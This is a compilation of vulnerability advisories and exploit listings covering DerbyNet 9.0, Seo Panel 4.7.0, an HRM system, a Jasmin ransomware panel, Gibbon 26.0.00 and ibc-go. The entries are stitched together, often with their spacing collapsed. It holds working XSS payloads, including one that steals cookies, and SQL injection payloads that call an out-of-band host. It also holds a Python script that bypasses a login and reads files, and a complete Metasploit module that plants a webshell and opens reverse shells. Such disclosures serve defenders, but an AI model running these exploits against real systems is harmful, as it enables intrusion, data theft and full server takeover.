DerbyNet version 9.0 suffers from a cross site scripting vulnerability in inc/kiosks.inc.

CVE ID: CVE-2024-30926

Description:  
A Cross-Site Scripting (XSS) vulnerability has been identified in DerbyNet version 9.0, affecting the `./inc/kiosks.inc` component. This vulnerability permits remote attackers to execute arbitrary code by exploiting the `address_for_current_kiosk()` function. The issue stems from the improper sanitization of user-supplied input via the URL parameters `id` and `address`, which are directly utilized without validation. This oversight allows the execution of malicious JavaScript code through crafted URLs.

Vulnerability Type: Cross-Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: ./inc/kiosks.inc

Attack Type: Remote

Impact: Code execution

Attack Vectors:  
The vulnerability can be exploited by manipulating URL parameters to inject malicious scripts. Examples include:  
- `http://127.0.0.1:8000/kiosk.php?id=<script>alert(1)</script>`  
- `http://127.0.0.1:8000/kiosk.php?address=<script>alert(1)</script>`

These manipulations demonstrate how an attacker could leverage unsanitized input to execute arbitrary JavaScript in the context of a user's session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 inc/kisosks.inc Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in photo-thumbs.php.

CVE ID: CVE-2024-30925

Description:  
A Cross-Site Scripting (XSS) vulnerability exists in DerbyNet version 9.0, specifically within the `photo-thumbs.php` component. This issue enables a remote attacker to execute arbitrary code through the improper handling of the `racerid` and `back` parameters. The vulnerability arises because the application dynamically generates URLs for navigation without adequately sanitizing these parameters, thus allowing the injection of malicious scripts.

Vulnerability Type: Cross-Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: photo-thumbs.php

Attack Type: Remote

Impact: Code execution

Attack Vectors:  
The XSS vulnerability can be exploited through manipulation of the `racerid` and `back` parameters in the URL. Examples of such manipulation include:  
- http://127.0.0.1:8000/photo-thumbs.php?repo=head&racerid=</script><script>alert(1)</script>  
- http://127.0.0.1:8000/photo-thumbs.php?back="><script>alert(1)</script></div>

These URLs demonstrate how an attacker could inject and execute arbitrary JavaScript within the context of the user's browser session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 photo-thumbs.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in checkin.php.

CVE ID: CVE-2024-30924

Description:  
A Cross Site Scripting (XSS) vulnerability has been identified in DerbyNet version 9.0, specifically within the `checkin.php` component. This vulnerability allows remote attackers to execute arbitrary code due to improper handling of the `order` URL parameter. The flaw lies in the way the `order` parameter is embedded directly into a JavaScript variable assignment without adequate sanitization or encoding, making it possible to inject scripts.

Vulnerability Type: Cross Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: checkin.php

Attack Type: Remote

Impact: Code execution is possible as a result of this vulnerability.

Attack Vectors:  
The XSS vulnerability can be exploited by manipulating the `order` parameter in the URL. For example:  
- `http://127.0.0.1:8000/checkin.php?order=</script><script>alert(1)</script>`  
- `http://127.0.0.1:8000/checkin.php?order=';alert(1);//`

These attack vectors demonstrate how an attacker could inject and execute arbitrary JavaScript within the context of the user's browser session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 checkin.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in photo.php.

    CVE ID: CVE-2024-30921Description:A Cross-Site Scripting (XSS) vulnerability has been identified in DerbyNet version 9.0, specifically affecting the photo.php component. This vulnerability allows remote attackers to execute arbitrary code via crafted URLs, without requiring authentication.Vulnerability Type: Cross-Site Scripting (XSS)Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: photo.phpAttack Type: RemoteImpact: Code executionAttack Vectors: The vulnerability can be exploited by navigating to a specially crafted URL such as:- http://127.0.0.1:8000/photo.php/<img src=x onerror=alert(1)>This method allows the attacker to inject arbitrary JavaScript that will be executed in the context of the victim's browser.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 photo.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in render-document.php.

    CVE ID: CVE-2024-30920Description:A Cross Site Scripting (XSS) vulnerability has been identified in DerbyNet v9.0, specifically within the `render-document.php` component. This vulnerability allows a remote attacker to execute arbitrary code via crafted URLs. The root cause of the vulnerability is the application's failure to properly sanitize user input in document rendering paths, which permits the injection of malicious scripts.Vulnerability Type: XSS (Cross Site Scripting)Vendor of Product:DerbyNet - https://github.com/jeffpiazza/derbynetAffected Product Code Base:DerbyNet - v9.0Affected Component:render-document.phpAttack Type:RemoteImpact:Code executionRoot Cause:The vulnerability arises from the application's display of debug information, including `ORIG_SCRIPT_FILENAME`, `DOCUMENT_URI`, `SCRIPT_NAME`, and `PHP_SELF`. These debug outputs improperly handle user-supplied input by not sanitizing it before inclusion in the output, leading directly to XSS vulnerabilities when malicious inputs are rendered by the browser.Attack Vectors:The vulnerability can be exploited with URLs such as:- `http://127.0.0.1:8000/render-document.php/racer/<img src=x onerror=alert(1)>`- `http://127.0.0.1:8000/render-document.php/<img src=x onerror=alert(1)>`Discoverer:Valentin LobsteinReferences:- http://derbynet.com- https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 render-document.php Cross Site Scripting

Seo Panel version 4.7.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Seo Panel 4.7.0 Reflected XSS# Exploit Author: Arzu DEMÝREZ# Date: 05.03-2024# Vendor Homepage: https://www.seopanel.org/# Software Link:  https://github.com/seopanel/Seo-Panel/releases/tag/4.7.0# Version: Seo Panel 4.7.0-Description: A cross-site scripting (XSS) issue in the SEO admin login panel version 4.7.0 allows remote attackers to inject JavaScript.- used:x" onmouseover=alert(document.cookie) x="Review Of Analysis:Ýn archive.ctp.php file include search_form and search_name input load on that script at line 71 as<a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a>because of that an attacker if send that codex" onmouseover=alert(document.cookie) x="can exploit the victim.<form id='search_form'>    <table width="100%" class="search">        <tr>            <th><?php echo $spText['common']['Name']?>: </th>            <td>                <input type="text" name="search_name" value="<?php echo htmlentities($searchInfo['search_name'], ENT_QUOTES)?>" onblur="<?php echo $submitLink?>">            </td>            <th><?php echo $spText['common']['Period']?>:</th>            <td colspan="2">                <input type="text" value="<?php echo $fromTime?>" name="from_time" id="from_time_summary"/>                <input type="text" value="<?php echo $toTime?>" name="to_time" id="to_time_summary"/>                <script>                  $( function() {                    $( "#from_time_summary, #to_time_summary").datepicker({dateFormat: "yy-mm-dd"});                  } );                </script>            </td>        <tr>        <tr>            <th><?php echo $spText['common']['Website']?>: </th>            <td>                <select name="website_id" id="website_id"  onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 180px;">                    <option value="">-- <?php echo $spText['common']['Select']?> --</option>                    <?php foreach($siteList as $websiteInfo){?>                        <?php if($websiteInfo['id'] == $websiteId){?>                            <option value="<?php echo $websiteInfo['id']?>" selected><?php echo $websiteInfo['name']?></option>                        <?php }else{?>                            <option value="<?php echo $websiteInfo['id']?>"><?php echo $websiteInfo['name']?></option>                        <?php }?>                    <?php }?>                </select>            </td>            <th><?php echo $spText['label']['Report Type']?>: </th>            <td>                <select name="report_type" id="report_type" onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 210px;">                    <option value="">-- <?php echo $spText['common']['Select']?> --</option>                    <?php foreach($reportTypes as $type => $info){?>                        <?php if($type == $searchInfo['report_type']){?>                            <option value="<?php echo $type?>" selected><?php echo $info?></option>                        <?php }else{?>                            <option value="<?php echo $type?>"><?php echo $info?></option>                        <?php }?>                    <?php }?>                </select>                <a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a>Saygýlarýmla / Best Regards,[cid:e33e203c-58cd-46ba-b1ea-f27e999dc68d]

Seo Panel 4.7.0 Cross Site Scripting

Human Resource Management System 2024 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: hrm2024.1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 04/02/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The cityedit parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'was submitted in the cityedit parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system by using thisvulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: cityedit (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(selectload_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+''ELSE 0x28 END)) AND 'GMzs'='GMzs    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT(ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK    Type: time-based blind    Title: MySQL > 5.0.12 AND time-based blind (heavy query)    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR1) AND 'Jtnd'='Jtnd---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/hrm-2024.1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/hrm202410-multiple-sqli.html)## Time spent:01:15:00

Human Resource Management System 2024 1.0 SQL Injection

Jasmin Ransomware version 1.1 suffers from an arbitrary file read vulnerability.

    # Exploit Title: Jasmin Ransomware arbitrary file read# Date: 2024-04-04# Exploit Author: @_chebuya# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware# Version: v1.1# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30851# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/mainimport requestsimport argparseimport osfrom bs4 import BeautifulSoupdef get_file(jasmin_url, filepath):    response = requests.get(        f'{jasmin_url}/download_file.php?file={filepath}',        allow_redirects=False    )    return response.textdef get_keys(jasmin_url):    headers = {        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',    }    data = "username=&password='+or+1%3D1+--+-&service=login"    login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)    cookies = login_req.cookies    list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)    soup = BeautifulSoup(list_req.text, 'html.parser')    rows = soup.find_all('tr')    print(f"Dumping decryption keys from {len(rows)-1} victims")    for row in rows:        data = row.find_all('td')        if len(data) == 0:            continue                username = data[1].get_text()        hostname = data[0].get_text()        filepath = data[7].find('a')['href'].split("=")[1]        print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")subparser = parser.add_subparsers(dest='subcommand')file_parser = subparser.add_parser("getfile", help="Read a file off the server")file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")args = parser.parse_args()if args.subcommand != None:    target_url = args.url.rstrip("/")if args.subcommand == "getkeys":    get_keys(target_url)elif args.subcommand == "getfile":    target_file = args.file.replace("\\", "/").replace("c:", "")    target_path = os.path.join("../../../../../../../../../", target_file)    print(get_file(target_url, target_path))else:    parser.print_help()

Jasmin Ransomware 1.1 Arbitrary File Read

A remote code execution vulnerability in Gibbon online school platform version 26.0.00 and lower allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the endpoint /modules/System%20Admin/import_run.php&type=externalAssessment&step=4. As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability',        'Description' => %q{          A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower          allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a          POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,          potentially resulting in complete system compromise, data exfiltration, or unauthorized access          to sensitive information.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Ali Maharramli', # SecondX.io Research Team - discovery of the vulnerability          'Fikrat Guliev', # SecondX.io Research Team - discovery of the vulnerability          'Islam Rzayev' # SecondX.io Research Team - discovery of the vulnerability        ],        'References' => [          ['CVE', '2024-24725'],          ['URL', 'https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725'],          ['PACKETSTORM', '177635'],          ['EDB', '51903']        ],        'DisclosureDate' => '2024-03-18',        'Platform' => ['php', 'unix', 'linux', 'win'],        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => false,        'Targets' => [          [            'PHP',            {              'Platform' => ['php'],              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],              'Linemax' => 16384,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :windows_dropper,              'Linemax' => 16384,              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),      OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address']),      OptString.new('PASSWORD', [true, 'Password'])    ])  end  def gibbon_login    # construct multipart login form data    form_data = Rex::MIME::Message.new    form_data.add_part('', nil, nil, 'form-data; name="address"')    form_data.add_part('default', nil, nil, 'form-data; name="method"')    form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"')    form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"')    form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"')    form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"')    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def construct_form_data(payload)    # construct multipart form data with payload    payload_len = payload.length    payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}"    form_data = Rex::MIME::Message.new    form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"')    form_data.add_part('sync', nil, nil, 'form-data; name="mode"')    form_data.add_part('N', nil, nil, 'form-data; name="syncField"')    form_data.add_part('', nil, nil, 'form-data; name="syncColumn"')    form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"')    form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')    form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')    form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')    form_data.add_part("#{Rex::Text.rand_text_alpha(8..16)}.xlsx", nil, nil, 'form-data; name="filename"')    form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')    form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')    form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')    return form_data  end  def upload_webshell(b64_payload)    # randomize file name if option WEBSHELL is not set    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")    # create webshell with base64 encoded PHP payload    # works for both windows and linux targets    php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"    form_data = construct_form_data(php_payload)    # upload webshell    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    res = upload_webshell(payload)    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200    register_file_for_cleanup(@webshell_name)    # execute webshell    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, @webshell_name),      'keep_cookies' => true    })  end  def execute_command(cmd, _opts = {})    form_data = construct_form_data(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def check    print_status("Checking if #{peer} can be exploited.")    res = send_request_cgi!({      'method' => 'GET',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path)    })    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200    # check if target is running the Gibbon online school platform    # search for the Gibbon version on the login page    return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')    # trying to get the version    version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/)    version_number = version[0].split('v') unless version.nil?    if version_number      if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00')        return CheckCode::Appears("Gibbon v#{version_number[1]}")      else        return CheckCode::Safe("Gibbon v#{version_number[1]}")      end    end    CheckCode::Detected  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    res = gibbon_login    fail_with(Failure::NoAccess, "Login failed with user #{datastore['USERNAME']} and password #{datastore['PASSWORD']}.") unless res && res.code == 302    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd, :windows_cmd      execute_command(payload.encoded)    when :linux_dropper, :windows_dropper      # don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

Gibbon School Platform 26.0.00 Remote Code Execution

**Name**: ASA-2024-007: Potential Reentrancy using Timeout Callbacks in ibc-hooks
**Component**: ibc-go
**Criticality**: Critical ([ACMv1](https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md): I:Critical; L:AlmostCertain)
**Affected versions**: < v4.6.0, < v5.4.0, < v6.3.0, < v7.4.0, < v8.2.0
**Affected users**: Chain Builders + Maintainers

# Summary

Through the deployment and subsequent use of a malicious CosmWasm contract via IBC interactions, an attacker could potentially execute the same `MsgTimeout` inside the IBC hook for the `OnTimeout` callback before the packet commitment is deleted. On chains where ibc-hooks wraps ICS-20, this vulnerability may allow for the logic of the `OnTimeout` callback of the transfer application to be recursively executed, leading to a condition that may present the opportunity for the loss of funds from the escrow account or unexpected minting of tokens.

# Affected Configurations

Chains which satisfy all of the following requirements are considered to be impacted by this vulnerability:
* Chain is IBC-enabled and uses a vulnerable version of ibc-go
* Chain is CosmWasm-enabled and allows code uploads for wasm contracts by anyone, or by authorized parties (to a lesser extent)
* Chain utilizes the ibc-hooks middleware and wraps ICS-20 transfer application

# Next Steps for Impacted Chain Builders and Maintainers

It is advised to immediately upgrade to the latest patch fix version of ibc-go for your chain. If you have already applied a soft-patch through private coordination, we recommend additionally updating to the latest ibc-go version via normal software upgrade governance.

If you have not upgraded your chain yet, and you desire to mitigate exposure to this vulnerability in the meantime, it is advisable to limit code uploading for contracts to trusted parties on your chain.

**If your chain only allows permissioned, access-controlled contract uploads, it is still strongly recommended to update to the latest patched ibc-go version for your chain per your normal software upgrade process.**

# Preparing for future coordination

If your chain would like to be included in future coordination efforts, please ensure your chain has a prominently displayed or otherwise easily available up-to-date email address for technical security contact available. A security.md file in the root of your projects’ code repository should contain this information. Additionally, please test this security contact with an unaffiliated email to ensure it works as expected and can receive emails from outside of your domain.

To ensure that your chain is included in future impact assessments, please keep your chain information up to date in the [Cosmos Chain Registry](https://github.com/cosmos/chain-registry) with code location, network name, and public RPC and API endpoints in the details.

We recommend that all chains configure and practice the use of the [Circuit Breaker module](https://docs.cosmos.network/main/build/modules/circuit) in the Cosmos SDK, as future vulnerability notifications may require the use of this mechanism as a mitigation against exploitation.

# Recognition

This issue was reported to the Cosmos Bug Bounty Program on HackerOne on 3/26/24 by Maxwell Dulin (Strikeout) at [Asymmetric Research](https://www.asymmetric.re/). If you believe you have found a bug in the Interchain Stack or would like to contribute to the program by reporting a bug, please see https://hackerone.com/cosmos.

# Notes

Due to the critical nature of this issue, both the ibc-go team and Amulet independently performed impact assessments for the ecosystem, which informed a risk-driven private patching effort that preceded this public release. This private patching effort significantly reduced the exposure of the ecosystem to this vulnerability. We appreciate the diligence and professionalism of all chains and validators involved with this effort – your ability to move quickly while maintaining confidentiality was instrumental in protecting the wider Interchain Ecosystem. 

If you ever have questions about security coordination efforts, public or private, please reach out to our official communication channel at [security@interchain.io](mailto:security@interchain.io).

For more information about ibc-go, please see https://ibc.cosmos.network/main.

For more information about the Interchain Foundation’s engagement with Amulet, please see https://github.com/interchainio/security.



**Name**: ASA-2024-007: Potential Reentrancy using Timeout Callbacks in ibc-hooks  
**Component**: ibc-go  
**Criticality**: Critical (ACMv1: I:Critical; L:AlmostCertain)  
**Affected versions**: < v4.6.0, < v5.4.0, < v6.3.0, < v7.4.0, < v8.2.0  
**Affected users**: Chain Builders + Maintainers

**Summary**

Through the deployment and subsequent use of a malicious CosmWasm contract via IBC interactions, an attacker could potentially execute the same MsgTimeout inside the IBC hook for the OnTimeout callback before the packet commitment is deleted. On chains where ibc-hooks wraps ICS-20, this vulnerability may allow for the logic of the OnTimeout callback of the transfer application to be recursively executed, leading to a condition that may present the opportunity for the loss of funds from the escrow account or unexpected minting of tokens.

**Affected Configurations**

Chains which satisfy all of the following requirements are considered to be impacted by this vulnerability:

*   Chain is IBC-enabled and uses a vulnerable version of ibc-go
*   Chain is CosmWasm-enabled and allows code uploads for wasm contracts by anyone, or by authorized parties (to a lesser extent)
*   Chain utilizes the ibc-hooks middleware and wraps ICS-20 transfer application

**Next Steps for Impacted Chain Builders and Maintainers**

It is advised to immediately upgrade to the latest patch fix version of ibc-go for your chain. If you have already applied a soft-patch through private coordination, we recommend additionally updating to the latest ibc-go version via normal software upgrade governance.

If you have not upgraded your chain yet, and you desire to mitigate exposure to this vulnerability in the meantime, it is advisable to limit code uploading for contracts to trusted parties on your chain.

**If your chain only allows permissioned, access-controlled contract uploads, it is still strongly recommended to update to the latest patched ibc-go version for your chain per your normal software upgrade process.**

**Preparing for future coordination**

If your chain would like to be included in future coordination efforts, please ensure your chain has a prominently displayed or otherwise easily available up-to-date email address for technical security contact available. A security.md file in the root of your projects’ code repository should contain this information. Additionally, please test this security contact with an unaffiliated email to ensure it works as expected and can receive emails from outside of your domain.

To ensure that your chain is included in future impact assessments, please keep your chain information up to date in the Cosmos Chain Registry with code location, network name, and public RPC and API endpoints in the details.

We recommend that all chains configure and practice the use of the Circuit Breaker module in the Cosmos SDK, as future vulnerability notifications may require the use of this mechanism as a mitigation against exploitation.

**Recognition**

This issue was reported to the Cosmos Bug Bounty Program on HackerOne on 3/26/24 by Maxwell Dulin (Strikeout) at Asymmetric Research. If you believe you have found a bug in the Interchain Stack or would like to contribute to the program by reporting a bug, please see https://hackerone.com/cosmos.

**Notes**

Due to the critical nature of this issue, both the ibc-go team and Amulet independently performed impact assessments for the ecosystem, which informed a risk-driven private patching effort that preceded this public release. This private patching effort significantly reduced the exposure of the ecosystem to this vulnerability. We appreciate the diligence and professionalism of all chains and validators involved with this effort – your ability to move quickly while maintaining confidentiality was instrumental in protecting the wider Interchain Ecosystem.

If you ever have questions about security coordination efforts, public or private, please reach out to our official communication channel at security@interchain.io.

For more information about ibc-go, please see https://ibc.cosmos.network/main.

For more information about the Interchain Foundation’s engagement with Amulet, please see https://github.com/interchainio/security.

**References**

*   GHSA-j496-crgh-34mx
*   cosmos/ibc-go@04275aa
*   cosmos/ibc-go@278fa89
*   cosmos/ibc-go@5e2e9eb
*   cosmos/ibc-go@a0185df
*   cosmos/ibc-go@e78b3a2

Tag

#git